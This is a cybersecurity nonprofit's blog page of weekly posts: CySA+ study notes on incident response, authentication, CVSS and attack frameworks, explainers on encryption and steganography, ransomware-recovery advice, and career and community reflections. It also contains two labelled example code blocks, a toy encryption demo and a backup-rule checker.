Cybersecurity Central | Refining the Human Connection | 501c3 Nonprofit

BLOG BY CC

 Cybersecurity Central is excited to share team insights in Blog by CC.

Bookmark this page and visit each week to learn more about what we are learning, thinking, creating, and discovering in our #infosec journeys.


#cybersecuritycentral #diversityofthought #blogbycc


FEB 1, 2023

The Containment Phase

by James Driscoll

February 1, 2023

Alright everyone, just eight days 'til my CompTIA CySA+ exam. For this week’s blog, I thought I would talk about the various containment strategies once an incident has been discovered. If you remember from last week, I mentioned the different phases of incident response. Containment is one of those phases.


When we talk about containment, we are talking about restricting the movement of the threat actor to the systems or part of the network they already have access to. This also means not providing a path to the rest of the network. There are four ways in which to restrict that movement, noted below:


 

References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide: Exam CSO-002. Indianapolis: John Wiley & Sons.


Time for Reflection

by Eula Chua

February 1, 2023

Hello February!

=====

Originally I planned to continue on the topic of encryption algorithms, but today’s #BlogByCC happened to fall perfectly on a new start to the month, and to do things differently, I want to take this opportunity to encourage and promote more self-reflection. I noticed that throughout the years I would go months just zooming through life and end up feeling a little bit lost in between. Just as with studying, if you don’t go back to review what you learned, you’ll end up forgetting it. Similarly with life, if you don’t take the time to reflect on how things are going, how would you know that where you’re heading is the direction you want to be going?


First of all, happy 1st of February! I can’t believe January flew by just like that. I remember starting off the month feeling a mixture of excitement and nervousness. I started my new IT career at a new workplace, which has so far been amazing and has exceeded my expectations. There are moments where I felt a little bit of impostor syndrome, but that gets trumped when I realize that I’m in a positive environment surrounded by people who genuinely care for your well-being, growth, and development. I get to say that I am a part of a growing and collaborative team that teaches and supports users on how to effectively use technology to help streamline their workflow. You know you’re making it when work doesn’t feel like work and every day is an opportunity to learn new things.


Enough about me and more about you! As we start a new month, new goals, and new aspirations, take a break to sit down and look back on how your January went. Here are some questions that may help you reflect on the past and upcoming month:



On behalf of Cybersecurity Central, we hope you have a wonderful month of February! Let us know how we can support you in your personal development and career growth in the IT/Cybersecurity sector by connecting with us through the Cybersecurity Central LinkedIn Page: https://www.linkedin.com/company/cybersecuritycentralorg


JAN 25, 2023

Symmetric Key Encryption Algorithm

by Eula Chua

January 25, 2023

Last week, we looked into the key differences between symmetric and asymmetric key encryption algorithms. The differences were found in the speed at which they process and secure data, the level of security they provide, the number of keys used to encrypt and decrypt, the lengths and sizes of the cipher text and plain text, and what they are used for.


This week, we’ll dive deeper into symmetric key encryption and its different types. Symmetric encryption keeps communicated data secure so that only authorized users can access it. This type of encryption uses the same key to encrypt and decrypt information. Although this keeps things cost-effective and easy to use, it is less secure. It is best used for handling and transferring large amounts of data. There are several types of symmetric key encryption: 3DES, DES, AES, RC4, Twofish, and Blowfish. Let’s look at the key points of each one.


3DES (Triple Data Encryption Standard):


DES (Data Encryption Standard):


AES (Advanced Encryption Standard):


RC4 (Rivest Cipher 4):


Twofish:


Blowfish:





Phases of Incident Response

by James Driscoll

January 25, 2023

With only two weeks left until my CompTIA CySA+ exam, I am moving right along. This week I will be discussing the Phases of Incident Response, which is Chapter 11 of the CompTIA CySA+ Exam Study Guide CSO-002.


Before I get into the phases of incident response, we must define a couple of terms and determine what constitutes a security incident. Those terms are a security event, an adverse security event, and a security incident:



Now that that is out of the way, we can move on to the phases of incident response. There are four phases: 1) Preparation; 2) Detection and Analysis; 3) Containment, Eradication, and Recovery; and 4) Post-Incident Activity. All of these will be discussed in detail below:



3. Containment, Eradication, and Recovery – After it has been determined an incident has occurred or is occurring, this is where we first limit the damage being caused by limiting the malware’s access to the rest of the network. Once this is accomplished, we move on to removing the malware from the infected systems. After the infected systems have been cleaned up, we can move on to recovery. This is where we get everything back to normal operations.


4. Post-Incident Activity – Once everything is back to normal, the incident response is not completely over. There is one final step that is important to accomplish. That step is a lessons learned review. In the military this is called a “Hot Wash”. Basically, this is a formal review where everyone involved gets together and goes back over the incident, noting what went well and what needs to be improved.


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide: Exam CSO-002. Indianapolis: John Wiley & Sons.

JAN 18, 2023

Software Testing

by James Driscoll

January 18, 2023

For week 7 of my journey to become CompTIA CySA+ certified I will be looking at software testing. When software is developed, no matter what it is, it should be done with security in mind.

One way to ensure that software is secure is through testing. This testing is broken down into two types: 1) static code analysis and 2) dynamic code analysis. Both will be discussed below.

Static code analysis – This is also known as source code analysis. The premise behind this is to look at the source code. So, as you can all guess from the name, with this type of analysis the code is not run. It is simply reviewed, either manually or using automated tools. The purpose is to understand the logic behind how it is written.

Dynamic code analysis – In this type of analysis, the code is run to see how it responds to various inputs. It can also be completed either manually or through automated tools. There are six types of testing that can be used in this type of analysis.


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide: Exam CSO-002. Indianapolis: John Wiley & Sons.

Symmetric vs. Asymmetric Encryption: Key Differences

by Eula Chua

January 18, 2023

I remember studying for CompTIA Security+ certification a couple of months ago and the topic I had trouble grasping was the difference between symmetric and asymmetric encryption.


First, let’s look at encryption. Encryption is the process of scrambling readable text (plaintext) into a code (ciphertext) to prevent unauthorized parties from accessing it. The only way it can be converted back to plaintext is if the authorized party possesses the decryption key. This is a method of securing sensitive information that gets passed online.


The two main types of encryption are symmetric and asymmetric. The main difference would be the use of keys, which are used to decrypt/unscramble a secret code.


Symmetric key encryption uses one key to encrypt and decrypt a message or data. Although having a single key is convenient and makes the encryption process fast, it is less secure. It requires the receiving party to share the same key as the sender, which puts data being sent over the network at risk of being uncovered.


Asymmetric key encryption requires two keys, a public key and a private key, to encrypt and decrypt a message or data. Compared to symmetric key encryption, it is considered much more secure but is a much slower process. The downside is that if the private key gets lost, there’s no other way to decrypt the data. Geeks for Geeks created a comparison table that best describes the differences between the two:


Symmetric Key Encryption

P = D(K, E(P))

where K → encryption and decryption key
P → plain text
D → decryption
E(P) → encryption of plain text


Asymmetric Key Encryption

P = D(Kd, E(Ke, P))

where Ke → encryption key
Kd → decryption key
D → decryption
E(Ke, P) → encryption of plain text using encryption key Ke
P → plain text
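The two identities above, worked in code as an added example that is not part of the original post: the symmetric half is a constructed keystream cipher (HMAC-SHA256 in counter mode, with the key K written explicitly as an argument of E) used only to show that the one shared key reverses its own encryption and that a different key does not; the asymmetric half is textbook RSA with tiny constructed primes to show that Ke and Kd are distinct keys. Neither construction is a production algorithm.

```python
"""Added example: P = D(K, E(K, P)) and P = D(Kd, E(Ke, P)) in code.

The keystream cipher and the toy RSA parameters are constructed for
illustration only; neither is a real-world algorithm or key size."""
import hashlib
import hmac
import os


# ---- Symmetric: one shared key K both encrypts and decrypts -----------------
def keystream(K, nonce, length):
    """Expand (K, nonce) into `length` pseudo-random bytes using HMAC-SHA256 in
    counter mode; the same K and nonce always produce the same stream."""
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(K, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def E(K, P):
    """Encrypt plaintext bytes P under key K; returns nonce || ciphertext."""
    nonce = os.urandom(16)
    C = bytes(p ^ s for p, s in zip(P, keystream(K, nonce, len(P))))
    return nonce + C


def D(K, C):
    """Decrypt: XOR with the same keystream undoes E, so D(K, E(K, P)) == P.
    A different K yields a different keystream and therefore garbage."""
    nonce, body = C[:16], C[16:]
    return bytes(c ^ s for c, s in zip(body, keystream(K, nonce, len(body))))


# ---- Asymmetric: Ke (public) encrypts, only Kd (private) decrypts -----------
def rsa_keypair(p, q, e=17):
    """Textbook RSA from two primes (constructed, tiny; real keys are 2048+ bits).
    Returns Ke = (e, n) and Kd = (d, n), where d is the inverse of e mod phi(n)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def E_asym(Ke, P):
    """Encrypt each plaintext byte m as c = m^e mod n (requires every m < n)."""
    e, n = Ke
    return [pow(m, e, n) for m in P]


def D_asym(Kd, C):
    """Decrypt each c as m = c^d mod n; this needs d, which Ke does not reveal."""
    d, n = Kd
    return bytes(pow(c, d, n) for c in C)


def demo():
    """Run both round trips; returns (symmetric_ok, wrong_key_fails, asym_ok)."""
    P = b"Hello February!"  # constructed sample plaintext
    K = os.urandom(32)
    symmetric_ok = D(K, E(K, P)) == P
    wrong_key_fails = D(os.urandom(32), E(K, P)) != P
    Ke, Kd = rsa_keypair(61, 53)  # constructed toy primes: n = 3233
    asym_ok = D_asym(Kd, E_asym(Ke, P)) == P and Ke != Kd
    return symmetric_ok, wrong_key_fails, asym_ok


if __name__ == "__main__":
    print(demo())
```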




JAN 11, 2023

Authentication Protocols

by James Driscoll

January 11, 2023

Week 6 of my journey to become CompTIA CySA+ certified. For this post I will be covering the various authentication protocols. Authentication is the first part of AAA, which stands for Authentication, Authorization, and Accounting. When accessing a network, we must give the network credentials that it can use to prove that we are legitimate users of that system. These credentials are our identity to the network. This is what the network uses to prove, or authenticate, that we are legitimate users.


Now, there are various protocols that can be used in the authentication process. I will cover the three that are in the CompTIA CySA+ Exam Study Guide CSO-002. They include TACACS+, RADIUS, and Kerberos.


TACACS+ – The Terminal Access Controller Access Control System Plus (TACACS+) is an expanded version of the original TACACS. One thing to keep in mind about this protocol is that there are a couple of issues with it:


So, what is the compensating control that can be used when changing protocols is not possible? The best practice is to place devices using TACACS+ on their own administrative network that is isolated from everything else.


RADIUS – Remote Authentication Dial-in User Service (RADIUS) is the most widely used AAA service. This service is used in client-server networks and runs over both TCP and UDP. Passwords are hashed using MD5 while in transit from client to server. So, it is more secure than TACACS+, but there is room for improvement.


Kerberos – This protocol is designed specifically for untrusted networks. All traffic is encrypted. There are three aspects associated with Kerberos:


Something to keep in mind is that Windows Active Directory utilizes Kerberos for authentication.

Until next week!


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide: Exam CSO-002. Indianapolis: John Wiley & Sons.


JAN 4, 2023

Happy New Year from Team CC!

by Eula Chua

January 4, 2023

We hope that you have an amazing start to the year. Last year was a year full of discoveries and learning. I took some time to evaluate where I was in my current state and where I wanted to be in my career. There were moments that felt painfully slow, in terms of my personal progress, and moments where I felt like things were moving rapidly. There were moments I took risks, and there were others where I wished I had taken the leap of faith. Nevertheless, I’m grateful to be where I am at this moment and for how much I have grown since the start of 2022. Most of my goals came to fruition because of self-reflection. Writing things down and keeping reminders on my calendar kept me away from distractions as much as possible.


This year, I have taken my reflection up a notch and, although this is not related to cybersecurity, I wanted to share this resource with everyone because it’s free! This is not a sponsored post, although I vouch for this, as many of the journal prompts included in this resource can otherwise only be found in physical journals and planners (planners can be costly), or you would have to search for questions on Google or formulate your own.


Year Compass provides you all the questions that can help you reflect on your past year and re-evaluate what things and habits you need to keep or leave in the past. This also includes writing prompts to help you plan out your 2023 and make it a memorable one. They give you the option of printing a physical copy or downloading a digital copy that you can upload on your digital notes app. Check out the Year Compass here: https://yearcompass.com


What are your goals for the year of 2023? What certifications are you aiming to achieve? What courses will you be taking? What online communities will you be participating in?


Let’s keep one another accountable! Follow Cybersecurity Central on socials below to stay up-to-date with all the livestream events, online courses, and conferences happening every week!


Security Controls

by James Driscoll

January 4, 2023

It is week five of my 10-week journey to becoming CompTIA CySA+ certified, so I am halfway through. This week is all about Security Controls. What are security controls? Security controls are implemented to “prevent, detect, counteract, or limit the impact of security risks” (Chapple & Seidl, 2020). These controls are divided into two groups: 1) how they are applied and 2) what the control is designed to accomplish.


Let us look at each group, starting with controls based on how they are applied. Now, depending on who you talk to, there are three, maybe four, controls that fit in here. They include:



Now, we can move on to the controls based on what they are designed to accomplish. There are three in this group:



Finally, there is one more type of control that does not fit into either group. The reason is that this control is designed to be an alternative when one of the others cannot be used for whatever reason. This control is called a compensating control.


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide: Exam CSO-002. Indianapolis: John Wiley & Sons.


DEC 28, 2022

Steganography

by Eula Chua

December 28, 2022

When I started using TryHackMe as a learning platform, steganography was one of the first lessons I took, and I have not forgotten about it since. So what is steganography?

According to the Merriam-Webster dictionary, steganography is the “art or practice of concealing a message, image, or file within another message, image or file” that is not so secret. The Greek word “steganos” or “stegos” means “covered”, while the word “graph” means “to write.” This could look like a secret message or plain text embedded into a picture. Hiding a sensitive message within a seemingly “ordinary” file is meant to avoid detection or suspicion. To elaborate, let’s look at the 5 different types of steganography.


Text Steganography


This method involves storing secret information by encoding it within a text document. Other techniques include line-shift coding, word-shift coding, feature coding, and the syntactic method. Check out Tutorials Point to learn more about these techniques: What are the Techniques of Text Steganography in Information Security?


Audio Steganography


This method conceals messages within audio clips, either to hide data or to watermark the audio, protecting it from unauthorized reproduction.


Image Steganography


This method is used to embed data within an image. This can involve altering the intensity values of the image pixels. Other forms of image steganography are as follows:



Video Steganography


This method involves concealing data by embedding it within a video file, which acts as the “carrier”. Discrete Cosine Transform (DCT) is often used as the method. This is done by inserting values in each image within the video file to conceal data.


Network/Protocol Steganography


This method uses network protocols such as TCP, UDP, and others to hide data. Covert channels may be utilized. These are channels that are not used to transfer information but rather to store it.


The main purpose of steganography is to provide some sort of hidden communication among those who know how to uncover it. This can be used as a way to protect sensitive data from potential malicious attacks. With the constant development of technology, steganography can also be used as a method to deliver attacks. One way is using PowerShell or Bash scripting to automate an attack, which can look like embedding scripts within a Word or Excel file that activate once it is opened, with the purpose of corruption. It all depends on the motive.



Cloud Responsibilities

by James Driscoll

December 28, 2022

During week four of my 10-week journey to becoming CompTIA CySA+ certified, I will be looking at the responsibilities of the Cloud Service Provider (CSP) and the customer. Operating on premises and operating in a cloud environment have both similarities and differences. Considerations for Confidentiality, Integrity, and Availability (CIA) must be made in both instances. Also, access management is an objective in both instances.


Now, the difference between on-premises and cloud environments is where responsibilities lie. In on-premises operations, the owner is responsible for everything. In a cloud environment, those responsibilities are split between the CSP and the customer, and they differ depending on the type of cloud service (IaaS, PaaS, and SaaS). Luckily, the CySA+ study guide by CompTIA has a nice graphic that illustrates how those responsibilities are divided up. I recreated the graphic below in Excel with the information reviewed in the CompTIA CySA+ Exam Study Guide CSO-002:


The above graphic is divided into three cloud services. Each of those services is divided into five different aspects where responsibilities lie.  One thing you will notice is that everything is color coded.  The white shading depicts what the customer is responsible for, the dark gray depicts what the CSP is responsible for, and the light orange depicts what responsibilities are shared by both the customer and the CSP.


So, what does this mean in terms of cybersecurity? Well, at the top of each service is the Data, and according to its shading, the customer is responsible for it, even in SaaS, where it is shared with the CSP. That means the customer, aka the owner of the data, is responsible for securing it.


I bring that up because moving to the cloud, while not a totally new concept, is new to some organizations and may be misunderstood. I think there may be a mindset that if an organization moves to the cloud, they are no longer responsible for anything, and that is simply not the case, as shown above.


The key takeaway is that, no matter whether your organization is considering moving to the cloud or has already moved, it is important to know where your responsibilities lie. The inspiration behind this blog is that there have been news stories lately about data stored in the cloud being breached due to misconfigurations, and I want to make sure that the cause is not a misunderstanding of responsibilities.



DEC 21, 2022

Common Vulnerability Scoring System (CVSS)

by James Driscoll

December 21, 2022

As we continue with week three of this 10-week trek to the CySA+ exam, I will discuss the Common Vulnerability Scoring System (CVSS).  As the name suggests, it is a scoring system for vulnerabilities.  Now, CVSS is part of a larger standardized security information communication platform called the Security Content Automation Protocol (SCAP). 


So, where are we most likely to see CVSS? Well, when a vulnerability is discovered, it is submitted to the National Vulnerability Database and given a Common Vulnerabilities and Exposures (CVE) number. CVE is also part of SCAP and is maintained by NIST. Anyway, the CVSS is part of the CVE report, as you can see in the screenshot below.

Upon closer examination, we see that there are two versions of the CVSS. Version 3 is the most recent version and is what is used for newer vulnerabilities. Older vulnerabilities are scored based on version 2.0. The next major item to notice is the Base Score, which is 7.8 High. Now, what does this mean? The CVSS scoring system works on a scale from 0 to 10 and is broken down into rating categories, shown in the visual below:


So, based on the scale, the 7.8 Base Score is the second highest rating a vulnerability can receive.  That means that any organization with this vulnerability should seriously look at remediating it.


Continuing with our examination of the above CVE, the next item we see is the “Vector”.  This is the actual CVSS and is what determines the base score.  As we can see, the CVSS is broken up into eight categories:



One thing you will notice is that in the above descriptions, I did not give numerical values for each of the criteria. I left those out for a reason. That reason is that, thanks to our friends at NIST, there is an online calculator that will calculate the score for us. The URL is https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator. It is easy to use. For each of the eight categories, click on the criterion that applies. When checking out the site you will see two more metrics: Temporal Score and Environmental Score. I am not covering them currently, as they appear to be outside the scope of the exam per the CompTIA CySA+ Study Guide.




DEC 14, 2022

Starting In IT first? Check Out These Free Resources!

by Eula Chua

December 14, 2022

I have heard this question repeated multiple times (or a similar question just like this), “How can you protect something if you don’t know how it works?”

In a way, this holds true. How do you know what systems to protect? What parts of the networks or systems are vulnerable or at risk if something were to happen?

As someone in pursuit of a career in cybersecurity, I first made the goal to start in an IT role before I continue down the path. As a hands-on learner, I want to learn and understand the ins and outs, the network infrastructures, the vendors used, hardware, software, the issues that end-users may encounter on a daily basis, literally everything within a company. Surely, there are ways to transition into cybersecurity from a completely different industry or right out of graduation and there are wonderful and reputable industry professionals on LinkedIn who speak on this.

However, if you’re someone like me looking to start in IT or review the fundamentals, here are some great free resources I highly recommend:

KevTech IT Support

Kevin from KevTech IT Support shares valuable information that will help those transitioning into IT prepare for their first job. He shares how to build your resume, IT FAQs, common IT interview questions, how to build your own virtual home lab, and much more. He also has a community on Discord.

East Charmer

If you want to know what a day in the life of an IT professional looks like, Marie from East Charmer creates videos to show you on-the-job responsibilities. Not only that, she also creates videos to help those seeking an IT support role and shows a glimpse of what it’s like to work in the office vs. working from home, what challenges and difficulties are faced within the role, and best IT practices.

RunCMD (formerly IT Career Questions)

Zach from RunCMD gives you all the insights into IT, such as knowing which certifications and roadmap to take, which trending skills and topics to dive into, home labs you can start building, and basically everything you need to know to get into IT.

Cobuman

If you want to get super technical, Cobuman is your go-to. Ranging from teaching you how to prepare for your next IT interview or certification to providing tips on help desk issues you may encounter on the job, Cobuman is ready to help you get a head start into your IT career.

NetworkChuck

If you want to learn scripting, hacking, and everything tech related, check out Chuck from NetworkChuck on YouTube. He provides fun and informative videos on a lot of different topics like Linux, CCNA, Docker, Raspberry Pi, cloud, certifications, and more.

CBT Nuggets

CBT Nuggets is a free IT on-demand training platform. They include courses from industry experts to help you study for your next IT certification or gain real-world IT skills.

Have I missed anything else that should be on this list?

Follow us on Cybersecurity Central on LinkedIn and let us know what else we can add!

Attack Frameworks

by James Driscoll

December 14, 2022

For week two of this 10-week excursion into CompTIA CySA+ I will be discussing the various attack frameworks.  These frameworks are utilized by organizations attempting to predict how an adversary will probably attack their organization.  This allows them to create defenses that are more likely to be effective in the event of an attack. 


According to the CompTIA CySA+ Study Guide, there are four attack frameworks that we should be familiar with.  They are 1) MITRE ATT&CK Framework, 2) The Diamond Model of Intrusion Analysis, 3) Lockheed Martin’s Cyber Kill Chain, and 4) The Unified Kill Chain.  I will go into further detail about each framework in the following paragraphs.


The first framework we will look at is the MITRE ATT&CK Framework. The MITRE Corporation created the ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework as a way for organizations to have access to common descriptions of the tactics, techniques, and procedures of known adversaries. The good thing about this framework is that there is no cost to access it. To access it, just go to https://attack.mitre.org. On the first page is the ATT&CK matrix. There is a plethora of information regarding adversary TTPs available.


The second framework is the Diamond Model of Intrusion Analysis.  The key thing to remember about this is that it is relationship based.  All the vertical lines of the model are called events.  So, the way this works is that analysts try to find as much information as they can by tracing the relationships between the events.

As you can see in the image above, all the vertical lines are events.  Where those lines intersect are core features of the events.  Unfortunately, the study guide really does not go into further detail about this framework.  It is just a basic overview for the test.


The third framework is the Lockheed Martin Cyber Kill Chain.  As the name suggests this framework was created by Lockheed Martin and consists of 7 processes that form a chain:


The fourth and final framework is the Unified Kill Chain.  Now, according to the CompTIA CySA+ Study Guide, while this framework is not testable, it is information that is good to know.  In a nutshell, this framework is a combination of the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and other frameworks.  All together they make up an 18-process chain that describes how an attack can occur both inside and outside a network.




DEC 7, 2022

Risk - Topics from CompTIA CySA+ Studies

by James Driscoll

December 7, 2022

I am currently studying for the CompTIA CySA+ exam, which stands for CompTIA Cybersecurity Analyst. Over the next 10 weeks, I will be picking topics from the CompTIA CySA+ Study Guide. This first blog in the series will cover risk.


The concept of risk is a major player in the world of cybersecurity. As professionals we constantly talk about our organization’s risk acceptance, aka risk appetite, but how do we define what a risk is? To define a risk, we need to discuss two other concepts. The first concept is a vulnerability, which is nothing more than a weakness. The second concept is a threat, which is any outside force that can exploit a vulnerability.


Now, there are a couple of ways to look at risk. 1) We can look at it as a mathematical equation that looks like “Risk = Threat X Vulnerability”. Keep in mind that with this type of representation, there are no numerical values to be entered. It is merely a statement that to have a risk, an organization must have both a vulnerability and a threat that can exploit it. 2) We can look at it through the lens of a Venn diagram, below:

What this diagram shows is that risk is where a threat and a vulnerability meet. 


Let us look at each entity, starting with threats. There are four types of threats an organization may encounter. Determining the threats to an organization requires an assessment that focuses outside that particular organization.



Moving on to vulnerability. As stated earlier, a vulnerability is nothing more than a weakness that a threat can use to its advantage. Unlike determining threats, when an organization determines its vulnerabilities, it focuses on itself.


This brings us to risk itself.  There are two concepts that are utilized when determining risk.  They are:


One way to calculate risk is to use a qualitative matrix that utilizes low, medium, and high ratings.  The diagram below is an example out of the CompTIA CySA+ Study Guide:

As you can see, the likelihood a threat will exploit a vulnerability is on the left with the impact on the bottom.  So, this is read just like a graph.  Low values are at the bottom and to the left, with higher values towards the top and to the right.

According to the CySA+ study guide this matrix can also be used as a quantitative matrix. That means instead of using Low, Medium, and High values, an organization assigns numerical values. Now, I have not seen a quantitative matrix, so I do not know what the maximum numerical value representing a high value would be. I would imagine that would be set by the individual organization.



CompTIA Network+ vs CCNA?: A Quick Learning Update

by Eula Chua

December 7, 2022

The past few months have been so focused on studying for Security+ that it’s been a while since I reviewed the fundamentals of networking. This month, I have decided to study and relearn some of the IT networking concepts in order to fully understand what those entering the IT field (or already in the field) will be protecting in the future. I haven’t decided if I want to pursue taking a certification exam, or which certification exam to take, but I do have the study materials to continue my independent learning. The two network certificates that are highly sought after (industry standard) are CompTIA Network+ and the Cisco Certified Network Associate (CCNA), which will be the focus for today’s blog.


If you are someone who may be thinking about getting a network certificate (or just studying for it) and can’t decide which one to take, then to get you started I’ll be sharing a few of the main differences and some resources that may help you determine which certificate is right for you and meets your needs.


CompTIA Network+:



CCNA:



Resources:



NOV 30, 2022

2022 Reflections

by Eula Chua

November 30, 2022

This blog post will be a bit different than usual.

As you read this, December is literally a day away.

It’s easy to get into the loop of thinking that we haven’t done everything we wanted to do on our list for this year or maybe, we didn’t even have an exact plan to begin with and feel a bit all over the place. That is okay. Things happen and sometimes, the pivots we made may have been necessary.

This year, I took a step forward to dive into the world of cybersecurity. I can tell you for a fact that I had no exact direction to begin with but went in anyway. I took my time researching most of the resources I found and fixed up my LinkedIn profile, which led me to connect with many wonderful cybersecurity communities online.

As long as you take action one step at a time, one thing leads to another and before you know it, you’ve done more than many others who are stuck overthinking which moves to make. If you need somewhere to start, I recommend checking out our Resources page here in Cybersecurity Central.

I invite you to reflect with me and look back on our own journey this year. This way, we can get a sense of where we are, how we got here, and what we are looking forward to in 2023.

Feel free to take some notes and answer the following reflection questions:


For more thought-provoking questions, check out this article by Indeed: 

100 Student Reflection Questions You Can Ask Yourself

I hope these questions help you discover new and amazing things about yourself!

NOV 23, 2022

Ways Organizations Can Recover From an Attack

by James Driscoll

November 23, 2022

In my last blog, I discussed the reasons why organizations should not pay adversaries when they are the victim of a ransomware attack. In this blog, I will discuss things organizations can do to facilitate recovery from an attack.


There are numerous things an organization can do to avoid paying a ransom in the event of an attack. The thing is that these need to be completed before an attack. That means organizations need to change their mindset of “we will not be attacked” to “we will be attacked at some point”. Only then will the following be effective.


One thing that is an absolute must is backups of your data. Now, in the case of backups, there is a generally accepted rule that should be followed. It is called the 3-2-1 backup rule. It breaks down like this: 3 total copies of the data (1 original, 2 copies). Now, the 2 copies need to be saved on two different types of media. The media can be anything, as long as they are different types. Finally, 1 of the copies needs to be stored off site. Cloud storage covers the last two (Elliot, n.d.).
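To make the 3-2-1 rule concrete, here is an added example (not from the blog or Elliot's article) that checks a backup inventory against it and reports which of the three requirements fails. The copy names, media types and locations are constructed for illustration.

```python
"""Check a backup inventory against the 3-2-1 rule.

Added example; the inventory below is constructed, not a real environment.
"""

from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class BackupCopy:
    name: str
    media: str        # media type, e.g. "disk", "tape", "cloud-object-storage"
    offsite: bool     # True if stored away from the primary site


@dataclass
class Rule321Result:
    total_copies: int
    media_types: int
    offsite_copies: int

    @property
    def compliant(self) -> bool:
        return not self.failures()

    def failures(self) -> List[str]:
        """Human-readable list of which of the 3, the 2 and the 1 are not met."""
        problems = []
        if self.total_copies < 3:
            problems.append(f"need 3 total copies, have {self.total_copies}")
        if self.media_types < 2:
            problems.append(f"backup copies span {self.media_types} media type(s), need 2")
        if self.offsite_copies < 1:
            problems.append("no copy is stored off site")
        return problems


def check_321(primary: BackupCopy, copies: List[BackupCopy]) -> Rule321Result:
    """Apply the rule as the post states it: 3 total copies (the original plus
    2 backups), the 2 backups on two different media types, and at least 1 of
    the backups off site. The original counts toward the 3 but not the 2 or 1."""
    return Rule321Result(
        total_copies=1 + len(copies),
        media_types=len({c.media for c in copies}),
        offsite_copies=sum(1 for c in copies if c.offsite),
    )


# Constructed inventory: an on-prem file server, a NAS on the same disk-type
# media, and a cloud copy. The cloud copy alone satisfies both the "different
# media" and the "off site" requirement, as the post notes.
PRIMARY = BackupCopy("file-server", "disk", offsite=False)
GOOD_COPIES = [
    BackupCopy("nightly-nas", "disk", offsite=False),
    BackupCopy("cloud-archive", "cloud-object-storage", offsite=True),
]
# Two on-site NAS copies on the same media type: 3 copies, but neither the 2 nor the 1.
WEAK_COPIES = [
    BackupCopy("nas-a", "disk", offsite=False),
    BackupCopy("nas-b", "disk", offsite=False),
]

if __name__ == "__main__":
    for label, copies in (("good", GOOD_COPIES), ("weak", WEAK_COPIES)):
        result = check_321(PRIMARY, copies)
        print(label, "compliant" if result.compliant else result.failures())
```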


Something else that is a necessity is an Incident Response Plan. A word of advice regarding this: make sure to print out a copy so it can be used in case of an attack. It is useless if it is saved on either a workstation or a server that is locked with ransomware. Luckily, our friends at NIST have a special publication that spells most of the elements out. NIST SP 800-61r2 lists 8 elements that should be in any Incident Response Plan. Those elements are:



These next few steps are designed to make the organization a hard target. In case some of you are wondering what a hard target is, it is a term the military uses to describe an entity that has a low susceptibility to attack. The reason I say low susceptibility is that there is no way to get the susceptibility level to zero. If an adversary wants to get onto a network, they will. So, the goal is to make it as difficult as possible and make them waste so much time that they simply give up and try to attack another organization. This is accomplished by:



The good thing about taking the above steps is that they help protect against more than just ransomware.


The one thing that I want everyone to take away from this is that we need to ensure our organizations are prepared. I say that because it is 2022, almost 2023, and from what I can tell, every organization is fair game for ransomware. It is no longer a matter of if an organization is going to become a victim, but rather when it will become a victim. So, by having an Incident Response Plan and testing it, training our users, updating software, and using anti-virus / anti-malware software, our organizations will hopefully not have to struggle with the decision of whether to pay a ransom and face a fine from the government because the ransomware group is on the sanctions list, or have their data released on the dark web.


References


Thankful for the Tech & InfoSec Community

by Kimberly McKnight

November 23, 2022

It's that time of the year again!  The holidays are approaching.  This week of Thanksgiving, we give thanks  for the people and things that make us feel grateful. 


I felt this was the perfect time to let the entire tech and infosec community know what an important role they have played in not only my life, but also in the lives of many others I have met and grown to know over the past couple of years transitioning into the industry. 


You may hear it all the time, but the community is where it's at.  There are so many communities available within tech and infosec, and that's important.  Each of us comes from different backgrounds and experiences, and these communities offer us a place to meet, connect, engage, help, support, and learn from each other. 


The important part is to find one, or several, that you feel comfortable in and start showing up.  The more you get intertwined in the community, the more support you will find.  Whether you are employed already, or seeking a new role, being involved in a supportive community is the key to success. Without the connections and relationships you will make, it is a lot harder to network and find a new role. 


Why? The majority of roles are in the "hidden" job market, meaning, they will never be posted.  Those hiring go to the people they know and trust and ask them for recommendations for upcoming (unposted) roles.  If you are not networking or involved in a community, the hidden job market is nearly impossible to tap into. 


Take myself for an example.  I wasn't even applying for roles yet, but I was so involved in one of my favorite infosec communities, simplycyber.io.  My current boss went to Gerald Auger, PhD, and asked him if he knew anyone to recommend for an upcoming role.  Because I was a regular in the community and my skills aligned with the potential role, I was recommended for the role, interviewed, and was hired. 


It can be scary, intimidating, and feel unknown at first, but stick with it, find a community you enjoy being a part of and engage with others within the community.  All of us have something to offer, even if it's support and an encouraging word.  You don't need to be technical to be a part of these communities. 


I may be a little biased, but Simply Cyber is absolutely hands down my favorite community out there.  Thanks to my friend, Stefan Waldvogel for sharing it with me.  Truly a community anyone new, or already in the industry, will appreciate and benefit from being a part of.  If you are into Discord, check out the Simply Cyber Discord, another great place to meet and connect if you can't make the livestreams, or want to connect anytime with the community. 


Again, I truly want to thank everyone who has been a part of my network, and the overarching community.  This journey would not have been possible without you.  I would love to hear, what are some of your favorite communities? 


Let us know on our LinkedIn page, where you can find our posts for these blogs each week: https://www.linkedin.com/company/cybersecuritycentralorg


Happy Thanksgiving! 

NOV 16, 2022

Why Organizations Should Not Pay Ransomware

by James Driscoll

November 16, 2022

We may all remember back in September, the Los Angeles Unified School District becoming a victim of a ransomware attack. A month later, we heard about Medibank, the largest insurance company in Australia, also becoming a victim of a ransomware attack. So, besides both joining the club of ransomware victims, what else do they have in common? Well, both organizations decided not to pay the ransom. In this blog I will discuss some of the reasons why an organization may not want to pay a ransom.


There are three main reasons an organization may not want to pay a ransom:

1) There is no guarantee that the organization will regain access to its information.

2) It almost guarantees that the organization will be attacked again.

3) It may be illegal to pay the ransom.


Let's take a deeper dive into each:

